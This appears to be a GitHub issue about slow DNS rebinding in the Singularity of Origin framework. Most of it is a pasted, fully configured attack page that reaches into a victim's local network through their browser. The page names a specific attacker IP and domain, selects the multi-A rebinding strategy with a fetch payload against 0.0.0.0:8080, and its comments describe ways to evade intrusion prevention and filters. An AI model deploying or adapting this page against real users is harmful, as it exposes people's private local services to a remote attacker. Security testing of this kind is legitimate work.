MA Attack Slow #64
Description
40s+ not under <5s like your domain rebind.it
my domain dynamic:
your domain rebind.it:
with same settings :
<!DOCTYPE html>
<html lang="en">
<!--
A sample fully automated attack that scans a local network for HTTP services,
attempts to fetch the home page via DNS rebinding
and dumps it to the developer console in case of success.
All options are described in more details below.
-->
<head>
<title>Singularity of Origin DNS Rebinding Automatic Attack</title>
<script src="./manager-ori.js"></script>
<!-- <script src=scan-manager.js></script> -->
<meta charset="utf-8" />
<meta http-equiv="x-dns-prefetch-control" content="off" />
</head>
<body id="body" style="display: none">
<h3>Scanning Progress</h3>
<div id="activity"></div>
<h3>DNS Rebinding Progress</h3>
<div id="attackframes"></div>
<script>
const configuration = {
attackHostIPAddress: "145.79.12.144", // CHANGE THIS to your attacking server IP address.
attackHostDomain: "dynamic.n2l.team", // CHANGE THIS to your attacker domain.
/* Rebinding Strategy section*/
// Select one of these strategy per target:
// "FromQueryFirstThenSecond":
// Default, conservative. Use interval: "20" when choosing this strategy.
rebindingStrategy: "ma",
// "FromQueryMultiA":
// Multiple DNS answers (fast)
// Rebinding in approximately 3 sec. Use interval: "1" when choosing this strategy.
// Works against localhost only, specifically:
// 0.0.0.0 when target is Linux/macos/Unix, and 127.0.0.1 when target is Windows based.
// rebindingStrategy: 'ma',
// "FromQueryRoundRobin":
// Round robin. Slower. Use for IPS/filters evasion or when DNS requests arrive out of sync.
// Use for IPS/filters evasion or when DNS requests arrive out of sync.
// rebindingStrategy: 'rr',
// "FromQueryRandom":
// Random. Slower. Use for IPS/filters evasion or when DNS requests arrive out of sync.
// Use for IPS/filters evasion or when DNS requests arrive out of sync.
// rebindingStrategy: 'rd',
/* Rebinding Strategy section ends*/
// Choose one of Singularity's attack payload to deliver to the victim host or write your own.
// 'Simple Fetch Get' fetches the '/' page of target and log it to the console.
attackPayload: "Simple Fetch Get",
// 'automatic' will attempt to detect services and automatically exploit them
// with all payloads available to Singularity!
//attackPayload: 'automatic',
// Interval in second to retry detecting a successful rebind.
// Use "20" for all rebinding strategies except for "FromQueryMultiA", where "1" will work.
interval: "1",
// Attack using the Fetch API ('fetch'), or iframes ('iframe')
// Fetch API works with most browsers, but is blocked by Chrome by most (but not all) target configurations.
// Inline Frame should work with most browsers, unless the target application does not allow rendering in an iframe.
attackMethod: "fetch",
// Flush Chrome DNS browser cache to improve DNS Rebinding attack speed.
flushDns: false,
// One of several tricks to determine
// whether we are pointing against the attacker or the victim domain.
indexToken: "<!--thisismytesttoken-->",
// Change the Websockets / Proxy port if you started Singularity with a different value.
wsProxyPort: 3129,
// show a blank page or not.
hideActivity: false,
// Rebind a headless browser. Default is false.
delayDOMLoad: false,
};
// Set the callback on successful rebinding a frame
// msg contains a frame msg
configuration.rebindingSuccessFn = (msg) => {
console.log(
`Iframe reports attack successful for ${msg.origin}\n${msg.data.response}`
);
};
//Update the Singularity app configuration
app.getConfiguration().setManually(configuration);
app.attackTarget("0.0.0.0", "8080", true);
</script>
</body>
</html>